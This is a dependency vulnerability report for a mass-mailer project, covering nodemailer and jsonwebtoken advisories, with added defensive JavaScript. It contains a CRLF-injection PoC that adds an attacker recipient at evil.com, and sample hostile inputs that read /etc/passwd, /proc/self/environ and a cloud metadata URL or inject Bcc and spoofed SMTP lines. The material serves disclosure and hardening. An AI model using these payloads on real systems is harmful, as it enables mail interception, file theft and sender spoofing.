Vulnerabilities: 11 via 11 paths
Dependencies: 159
Source: GitHub

Severity: 3 high, 7 medium, 1 low

high severity

Uncontrolled Recursion

  • Vulnerable module: nodemailer
  • Introduced through: nodemailer@6.10.1

Detailed paths

  • Introduced through: lfs-mass-mailer@UBC-LFS/lfs-mass-mailer nodemailer@6.10.1
    Remediation: Upgrade to nodemailer@7.0.11.

Overview

nodemailer is a library for "easy as cake" e-mail sending from Node.js applications.

Affected versions of this package are vulnerable to Uncontrolled Recursion in the addressparser function. An attacker can crash the process (an unhandled stack overflow terminates Node.js immediately) by supplying an address header containing deeply nested address groups, i.e. a long run of colon-delimited group prefixes.

Remediation

Upgrade nodemailer to version 7.0.11 or higher.

high severity (new)

CRLF Injection

  • Vulnerable module: nodemailer
  • Introduced through: nodemailer@6.10.1

Detailed paths

  • Introduced through: lfs-mass-mailer@UBC-LFS/lfs-mass-mailer nodemailer@6.10.1
    Remediation: Upgrade to nodemailer@8.0.9.

Overview

nodemailer is a library for "easy as cake" e-mail sending from Node.js applications.

Affected versions of this package are vulnerable to CRLF Injection via the comment field in the list message option. Because the value is written into a header line without CR/LF filtering, an attacker who controls that field can inject arbitrary headers into the generated message by supplying input containing CRLF sequences.

Remediation

Upgrade nodemailer to version 8.0.9 or higher.

high severity (new)

Server-side Request Forgery (SSRF)

  • Vulnerable module: nodemailer
  • Introduced through: nodemailer@6.10.1

Detailed paths

  • Introduced through: lfs-mass-mailer@UBC-LFS/lfs-mass-mailer nodemailer@6.10.1
    Remediation: Upgrade to nodemailer@9.0.1.

Overview

nodemailer is a library for "easy as cake" e-mail sending from Node.js applications.

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) via the message-level raw option, which is not subject to the disableFileAccess and disableUrlAccess flags. An attacker who controls the raw field can make the server read arbitrary local files or issue server-side requests, bypassing the intended access restrictions, with the fetched content being sent to an attacker-controlled recipient.

Remediation

Upgrade nodemailer to version 9.0.1 or higher.

medium severity

CRLF Injection

  • Vulnerable module: nodemailer
  • Introduced through: nodemailer@6.10.1

Detailed paths

  • Introduced through: lfs-mass-mailer@UBC-LFS/lfs-mass-mailer nodemailer@6.10.1
    Remediation: Upgrade to nodemailer@8.0.5.

Overview

nodemailer is a library for "easy as cake" e-mail sending from Node.js applications.

Affected versions of this package are vulnerable to CRLF Injection via the name transport configuration option (the client hostname sent in the EHLO/HELO greeting). An attacker who controls that value can inject arbitrary SMTP commands by supplying carriage return and line feed sequences; because the greeting is sent before authentication, this enables unauthorized email sending, sender spoofing, and phishing attacks.

Remediation

Upgrade nodemailer to version 8.0.5 or higher.

medium severity

Interpretation Conflict

  • Vulnerable module: nodemailer
  • Introduced through: nodemailer@6.10.1

Detailed paths

  • Introduced through: lfs-mass-mailer@UBC-LFS/lfs-mass-mailer nodemailer@6.10.1
    Remediation: Upgrade to nodemailer@7.0.7.

Overview

nodemailer is a library for "easy as cake" e-mail sending from Node.js applications.

Affected versions of this package are vulnerable to Interpretation Conflict due to improper handling of quoted local-parts containing @. An attacker can cause mail to be delivered to an unintended external domain, or bypass domain-based access controls, by crafting addresses whose quoted local-part contains an @ character (for example "user@external.example"@trusted.example), which the library and the access control parse differently.

Remediation

Upgrade nodemailer to version 7.0.7 or higher.
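
An added example, not code from the Snyk report or from nodemailer, covering this advisory and the Uncontrolled Recursion one above. It is a bounded, single-pass scanner for an address-list header that a mass mailer can run before handing recipient data to the library: group nesting is counted against a hard limit instead of being followed by recursion, and the domain of each mailbox is taken from the @ outside any quoted local-part. The depth limit MAX_GROUP_DEPTH, the helper names, and the DEEP_HEADER input are assumptions made for the example; countGroupsRecursive() only illustrates the shape of the bug.

```javascript
'use strict';
// Added example, not code from the Snyk report or from nodemailer.
// Hypothetical limit: real headers almost never nest groups, so 4 is generous.
const MAX_GROUP_DEPTH = 4;

// The shape of the bug: a parser that re-enters itself once per group turns
// input length into stack depth. A long run of "g:" prefixes ends in a
// RangeError (stack overflow), which, unhandled, terminates the process.
function countGroupsRecursive(header, from = 0) {
  const colon = header.indexOf(':', from);
  return colon === -1 ? 0 : 1 + countGroupsRecursive(header, colon + 1);
}

// Returns { depth, mailboxes } or throws. One pass, O(n), no recursion, so the
// attacker's input length can never become stack depth.
function scanAddressHeader(header, maxDepth = MAX_GROUP_DEPTH) {
  let depth = 0, maxSeen = 0, inQuote = false, inLiteral = false, comment = 0, token = '';
  const mailboxes = [];
  const flush = () => { if (token.trim()) mailboxes.push(token.trim()); token = ''; };
  for (let i = 0; i < header.length; i++) {
    const c = header[i];
    if (inQuote) {                       // quoted-string: copy verbatim, honour backslash escapes
      token += c;
      if (c === '\\' && i + 1 < header.length) token += header[++i];
      else if (c === '"') inQuote = false;
      continue;
    }
    if (inLiteral) { token += c; if (c === ']') inLiteral = false; continue; }  // [IPv6:::1]
    if (comment > 0) { if (c === '(') comment++; else if (c === ')') comment--; continue; }
    switch (c) {
      case '"': inQuote = true; token += c; break;
      case '[': inLiteral = true; token += c; break;
      case '(': comment++; break;
      case ':':                          // group start; the display name before it is dropped
        if (++depth > maxDepth) throw new Error(`group nesting ${depth} exceeds limit ${maxDepth}`);
        maxSeen = Math.max(maxSeen, depth); token = ''; break;
      case ';': flush(); if (depth > 0) depth--; break;
      case ',': flush(); break;
      default: token += c;
    }
  }
  if (inQuote || inLiteral || comment > 0) throw new Error('unbalanced quote, literal or comment');
  flush();
  return { depth: maxSeen, mailboxes };
}

// Domain of one mailbox ("Name <addr>" or a bare addr): skip a quoted
// local-part first, then look for the @ that actually separates the domain.
function domainOf(mailbox) {
  let s = mailbox.trim();
  const lt = s.lastIndexOf('<');
  if (lt !== -1 && s.endsWith('>')) s = s.slice(lt + 1, -1);
  let i = 0;
  if (s[0] === '"') {
    for (i = 1; i < s.length && s[i] !== '"'; i++) if (s[i] === '\\') i++;
    i++;                                 // step past the closing quote
  }
  const at = s.indexOf('@', i);
  if (at === -1) throw new Error(`no domain in ${mailbox}`);
  const domain = s.slice(at + 1).toLowerCase();
  if (!/^[a-z0-9.-]+$|^\[[0-9a-z:.]+\]$/.test(domain)) throw new Error(`suspicious domain in ${mailbox}`);
  return domain;
}

// The naive reading many domain allow-lists use. It disagrees with domainOf()
// on quoted local-parts, which is the interpretation conflict the advisory names.
function naiveDomainOf(mailbox) {
  return mailbox.replace(/^.*</, '').replace(/>$/, '').split('@')[1];
}

// Constructed hostile input: 200000 nested groups in front of one address.
const DEEP_HEADER = 'g:'.repeat(200000) + 'a@b.example';
```

Run scanAddressHeader() on untrusted recipient lists and compare domainOf() against the allow-list; if the naive split and domainOf() disagree on an address, treat it as hostile rather than picking one reading.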

medium severity

Use of a Broken or Risky Cryptographic Algorithm

  • Vulnerable module: jsonwebtoken
  • Introduced through: jsonwebtoken@8.5.1

Detailed paths

  • Introduced through: lfs-mass-mailer@UBC-LFS/lfs-mass-mailer jsonwebtoken@8.5.1
    Remediation: Upgrade to jsonwebtoken@9.0.0.

Overview

jsonwebtoken is a JSON Web Token implementation (symmetric and asymmetric)

Affected versions of this package are vulnerable to Use of a Broken or Risky Cryptographic Algorithm because the library does not check that the key type matches the signing algorithm, so legacy or insecure key types can be used for signature verification. For example, a DSA key could be used with the RS256 algorithm.

Exploitability

Users are affected when they use an algorithm with a key type other than the supported combinations below:

  • EC keys: ES256, ES384, ES512
  • RSA keys: RS256, RS384, RS512, PS256, PS384, PS512
  • RSA-PSS keys: PS256, PS384, PS512

For the Elliptic Curve algorithms, the key must also use the matching curve:

  • ES256: prime256v1
  • ES384: secp384r1
  • ES512: secp521r1

Workaround

Users who must keep an otherwise invalid key type/algorithm combination for legacy compatibility can set the allowInvalidAsymmetricKeyTypes option to true in the sign() and verify() functions of 9.0.0. This re-enables the unchecked behaviour and should be treated as a temporary measure, not a fix.

Remediation

Upgrade jsonwebtoken to version 9.0.0 or higher.

medium severity

Improper Restriction of Security Token Assignment

  • Vulnerable module: jsonwebtoken
  • Introduced through: jsonwebtoken@8.5.1

Detailed paths

  • Introduced through: lfs-mass-mailer@UBC-LFS/lfs-mass-mailer jsonwebtoken@8.5.1
    Remediation: Upgrade to jsonwebtoken@9.0.0.

Overview

jsonwebtoken is a JSON Web Token implementation (symmetric and asymmetric)

Affected versions of this package are vulnerable to Improper Restriction of Security Token Assignment via the secretOrPublicKey argument, when the key retrieval function passed to jwt.verify() can return both symmetric secrets and asymmetric public keys. A token that should be verified with an asymmetric public key can then be forged and verified with the symmetric HS256 algorithm, using the public key bytes as the HMAC secret.

Note: This vulnerability affects your application if it supports the usage of both symmetric and asymmetric keys in jwt.verify() implementation with the same key retrieval function.

Remediation

Upgrade jsonwebtoken to version 9.0.0 or higher.

medium severity

Improper Authentication

  • Vulnerable module: jsonwebtoken
  • Introduced through: jsonwebtoken@8.5.1

Detailed paths

  • Introduced through: lfs-mass-mailer@UBC-LFS/lfs-mass-mailer jsonwebtoken@8.5.1
    Remediation: Upgrade to jsonwebtoken@9.0.0.

Overview

jsonwebtoken is a JSON Web Token implementation (symmetric and asymmetric)

Affected versions of this package are vulnerable to Improper Authentication because, when no algorithms option is given to jwt.verify(), verification can fall through to the none algorithm and an unsigned token passes signature validation.

Exploitability

Users are affected only if all of the following conditions are true for the jwt.verify() function:

  1. A token with no signature is received.

  2. No algorithms are specified.

  3. A falsy (e.g., null, false, undefined) secret or key is passed.

Remediation

Upgrade jsonwebtoken to version 9.0.0 or higher.

medium severity (new)

Improper Certificate Validation

  • Vulnerable module: nodemailer
  • Introduced through: nodemailer@6.10.1

Detailed paths

  • Introduced through: lfs-mass-mailer@UBC-LFS/lfs-mass-mailer nodemailer@6.10.1
    Remediation: Upgrade to nodemailer@8.0.8.

Overview

nodemailer is a library for "easy as cake" e-mail sending from Node.js applications.

Affected versions of this package are vulnerable to Improper Certificate Validation due to the use of rejectUnauthorized: false in the internal HTTPS client, which disables TLS certificate verification during OAuth2 token retrieval. An attacker can intercept sensitive OAuth2 credentials and tokens by performing a machine-in-the-middle attack on the HTTPS connection.

Remediation

Upgrade nodemailer to version 8.0.8 or higher.

medium severity (new)

Missing Authorization

  • Vulnerable module: nodemailer
  • Introduced through: nodemailer@6.10.1

Detailed paths

  • Introduced through: lfs-mass-mailer@UBC-LFS/lfs-mass-mailer nodemailer@6.10.1
    Remediation: Upgrade to nodemailer@8.0.9.

Overview

nodemailer is a library for "easy as cake" e-mail sending from Node.js applications.

Affected versions of this package are vulnerable to Missing Authorization in the jsonTransport transport, which fails to enforce the file and URL access restrictions (disableFileAccess and disableUrlAccess) during message normalization. An attacker can read local files or trigger outbound HTTP requests by supplying crafted message content fields such as an attachment path or text.href.

Remediation

Upgrade nodemailer to version 8.0.9 or higher.
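
An added example, not code from the Snyk report or from nodemailer, serving this advisory and the SSRF one above. Both are cases where the library did not apply disableFileAccess/disableUrlAccess to some content field, so a mass mailer that builds messages from uploaded templates or recipient records should refuse file- and URL-backed content before the message reaches the transport, rather than relying on the library's flags alone. The walker below flags any path or href key under nodemailer's documented content options (text, html, watchHtml, amp, icalEvent, attachments, alternatives, raw). The function names and SAMPLE_UNTRUSTED_MESSAGE are constructed for the example.

```javascript
'use strict';
// Added example, not code from the Snyk report or from nodemailer.
// Message options nodemailer resolves into content, and the sub-fields that
// make it read a file or fetch a URL while doing so (documented options).
const CONTENT_FIELDS = ['text', 'html', 'watchHtml', 'amp', 'icalEvent', 'attachments', 'alternatives', 'raw'];
const FETCH_FIELDS = new Set(['path', 'href']);

// Returns the locations (as /field/index/key paths) of every value that would
// make nodemailer touch the filesystem or the network. Nested objects are
// walked so raw: { path }, attachments[i].raw: { href } and similar are caught.
function findExternalContent(message) {
  const hits = [];
  const walk = (node, where) => {
    if (Array.isArray(node)) { node.forEach((item, i) => walk(item, `${where}/${i}`)); return; }
    if (node === null || typeof node !== 'object' || Buffer.isBuffer(node)) return;
    for (const [key, value] of Object.entries(node)) {
      if (FETCH_FIELDS.has(key)) hits.push(`${where}/${key}`);
      else walk(value, `${where}/${key}`);
    }
  };
  for (const field of CONTENT_FIELDS) if (field in message) walk(message[field], `/${field}`);
  return hits;
}

// Gate: throw before sendMail(). Use it in addition to
// createTransport({ ..., disableFileAccess: true, disableUrlAccess: true }),
// since the advisories are exactly the cases where those flags were skipped.
function assertNoExternalContent(message) {
  const hits = findExternalContent(message);
  if (hits.length > 0) throw new Error(`refusing message: external content at ${hits.join(', ')}`);
  return message;
}

// Constructed sample of what an untrusted template or recipient record might carry.
const SAMPLE_UNTRUSTED_MESSAGE = {
  from: 'noreply@example.edu',
  to: 'student@example.edu',
  subject: 'Newsletter',
  text: { path: '/etc/passwd' },                          // local file read
  html: '<p>Inline HTML is fine; it is a string, not a fetch.</p>',
  attachments: [
    { filename: 'notes.txt', content: 'inline content is fine' },
    { filename: 'meta.txt', href: 'http://169.254.169.254/latest/meta-data/' },  // SSRF to metadata service
  ],
  raw: { path: '/proc/self/environ' },                    // the message-level raw bypass
};

const SAMPLE_CLEAN_MESSAGE = {
  from: 'noreply@example.edu',
  to: 'student@example.edu',
  subject: 'Newsletter',
  text: 'plain text',
  attachments: [{ filename: 'notes.txt', content: Buffer.from('inline') }],
};
```

Strings are never flagged, so a legitimate mailto: or https: link inside the HTML body passes; only the object-shaped fields that instruct nodemailer to fetch something are refused.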

low severity

CRLF Injection

  • Vulnerable module: nodemailer
  • Introduced through: nodemailer@6.10.1

Detailed paths

  • Introduced through: lfs-mass-mailer@UBC-LFS/lfs-mass-mailer nodemailer@6.10.1
    Remediation: Upgrade to nodemailer@8.0.4.

Overview

nodemailer is a library for "easy as cake" e-mail sending from Node.js applications.

Affected versions of this package are vulnerable to CRLF Injection via the envelope.size parameter in the sendMail function. An attacker can inject arbitrary SMTP commands by supplying CRLF characters in the size property, which are concatenated directly into the SMTP command stream. This can result in unauthorized recipients being added to outgoing emails or other SMTP commands being executed.

Note: This is only exploitable if the application explicitly passes a custom envelope object with a user-controlled size property to the mail sending process.

PoC

const net = require('net');
const nodemailer = require('nodemailer');

// Minimal SMTP server that logs raw commands
const server = net.createServer(socket => {
    socket.write('220 localhost ESMTP\r\n');
    let buffer = '';
    socket.on('data', chunk => {
        buffer += chunk.toString();
        const lines = buffer.split('\r\n');
        buffer = lines.pop();
        for (const line of lines) {
            if (!line) continue;
            console.log('C:', line);
            if (line.startsWith('EHLO')) {
                socket.write('250-localhost\r\n250-SIZE 10485760\r\n250 OK\r\n');
            } else if (line.startsWith('MAIL FROM')) {
                socket.write('250 OK\r\n');
            } else if (line.startsWith('RCPT TO')) {
                socket.write('250 OK\r\n');
            } else if (line === 'DATA') {
                socket.write('354 Start\r\n');
            } else if (line === '.') {
                socket.write('250 OK\r\n');
            } else if (line.startsWith('QUIT')) {
                socket.write('221 Bye\r\n');
                socket.end();
            }
        }
    });
});

server.listen(0, '127.0.0.1', () => {
    const port = server.address().port;
    console.log('SMTP server on port', port);
    console.log('Sending email with injected RCPT TO...\n');

    const transporter = nodemailer.createTransport({
        host: '127.0.0.1',
        port,
        secure: false,
        tls: { rejectUnauthorized: false },
    });

    transporter.sendMail({
        from: 'sender@example.com',
        to: 'recipient@example.com',
        subject: 'Normal email',
        text: 'This is a normal email.',
        envelope: {
            from: 'sender@example.com',
            to: ['recipient@example.com'],
            size: '100\r\nRCPT TO:<attacker@evil.com>',
        },
    }, (err) => {
        if (err) console.error('Error:', err.message);
        console.log('\nExpected output above:');
        console.log('  C: MAIL FROM:<sender@example.com> SIZE=100');
        console.log('  C: RCPT TO:<attacker@evil.com>        <-- INJECTED');
        console.log('  C: RCPT TO:<recipient@example.com>');
        server.close();
        transporter.close();
    });
});

Remediation

Upgrade nodemailer to version 8.0.4 or higher.
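
An added example, not code from the Snyk report or from nodemailer, serving this advisory and the two other CRLF advisories on this page (the list comment and the name option). All three share one root cause: a caller-controlled value (envelope.size, the hostname sent in EHLO, the comment of a List-* header) is pasted into a CR/LF-delimited stream. The *Unsafe builders below reproduce that shape; the hardened ones validate each value against the grammar the protocol gives it, and linesSeenByPeer() splits the result the way the PoC's SMTP server above does, so the injected line becomes visible without a network. The builder and constant names and the INJECTED_* inputs are constructed for the example; the SIZE grammar follows RFC 1870 and the comment escaping follows RFC 5322.

```javascript
'use strict';
// Added example, not code from the Snyk report or from nodemailer.

// One protocol line per CRLF, as the receiving server reads it.
function linesSeenByPeer(stream) {
  return stream.split('\r\n').filter((line) => line.length > 0);
}

// --- vulnerable shape: straight interpolation ----------------------------
function buildMailFromUnsafe(envelope) {
  let cmd = `MAIL FROM:<${envelope.from}>`;
  if (envelope.size) cmd += ` SIZE=${envelope.size}`;   // '100\r\nRCPT TO:<x>' becomes two commands
  return cmd + '\r\n';
}
function buildEhloUnsafe(name) {
  return `EHLO ${name}\r\n`;          // sent before AUTH, so injected commands run unauthenticated
}
function buildListHeaderUnsafe(field, url, comment) {
  return `List-${field}: <${url}>${comment ? ` (${comment})` : ''}\r\n`;
}

// --- hardened shape: validate, then interpolate --------------------------
const CR_OR_LF = /[\r\n]/;
const HOSTNAME = /^(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$/;
const ADDRESS_LITERAL = /^\[[0-9A-Za-z:.]+\]$/;       // [192.0.2.1] or [IPv6:2001:db8::1]
const LIST_FIELDS = new Set(['Help', 'Unsubscribe', 'Subscribe', 'Post', 'Owner', 'Archive', 'Id']);

function rejectCrlf(label, value) {
  if (CR_OR_LF.test(String(value))) throw new Error(`${label}: CR or LF not allowed`);
  return String(value);
}

function buildMailFrom(envelope) {
  const from = rejectCrlf('envelope.from', envelope.from);
  if (/[<>\s]/.test(from)) throw new Error('envelope.from: must be a bare address');
  let cmd = `MAIL FROM:<${from}>`;
  if (envelope.size !== undefined) {
    // SIZE is a decimal byte count: digits only, nothing else reaches the wire.
    if (!/^\d{1,15}$/.test(String(envelope.size))) throw new Error('envelope.size: must be a non-negative integer');
    cmd += ` SIZE=${Number(envelope.size)}`;
  }
  return cmd + '\r\n';
}

function buildEhlo(name) {
  if (!HOSTNAME.test(name) && !ADDRESS_LITERAL.test(name)) {
    throw new Error('name: must be a hostname or an address literal');
  }
  return `EHLO ${name}\r\n`;
}

function buildListHeader(field, url, comment) {
  if (!LIST_FIELDS.has(field)) throw new Error(`list field ${field} not recognised`);
  if (/[<>\s]/.test(rejectCrlf('list url', url))) throw new Error('list url: whitespace or angle brackets not allowed');
  let suffix = '';
  if (comment !== undefined) {
    // RFC 5322 comment: CR/LF refused; parentheses and backslash escaped as quoted-pairs
    suffix = ` (${rejectCrlf('list comment', comment).replace(/[()\\]/g, (c) => '\\' + c)})`;
  }
  return `List-${field}: <${url}>${suffix}\r\n`;
}

// Constructed attacker inputs; the first is the payload of the PoC above.
const INJECTED_SIZE = '100\r\nRCPT TO:<attacker@evil.example>';
const INJECTED_NAME = 'mail.example.edu\r\nMAIL FROM:<spoof@example.edu>';
const INJECTED_COMMENT = 'unsubscribe)\r\nBcc: attacker@evil.example\r\nX-Pad: (';

function demo() {
  const tryBuild = (fn) => { try { return fn(); } catch (e) { return `rejected: ${e.message}`; } };
  return {
    unsafeMailFrom: linesSeenByPeer(buildMailFromUnsafe({ from: 'sender@example.edu', size: INJECTED_SIZE })),
    hardenedMailFrom: tryBuild(() => buildMailFrom({ from: 'sender@example.edu', size: INJECTED_SIZE })),
    unsafeEhlo: linesSeenByPeer(buildEhloUnsafe(INJECTED_NAME)),
    hardenedEhlo: tryBuild(() => buildEhlo(INJECTED_NAME)),
    unsafeList: linesSeenByPeer(buildListHeaderUnsafe('Unsubscribe', 'https://example.edu/u', INJECTED_COMMENT)),
    hardenedList: tryBuild(() => buildListHeader('Unsubscribe', 'https://example.edu/u', INJECTED_COMMENT)),
    legitMailFrom: buildMailFrom({ from: 'sender@example.edu', size: 100 }),
    legitList: buildListHeader('Unsubscribe', 'https://example.edu/u', 'one (1) click'),
  };
}
```

Rejecting CR and LF is the minimum; the hardened builders go further and accept only the value's own grammar (digits for SIZE, a hostname or address literal for EHLO), so a future protocol trick that does not rely on CRLF still has nowhere to go. For an application that cannot upgrade immediately, the same checks belong at the point where envelope, transport name and list options are assembled from user input.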
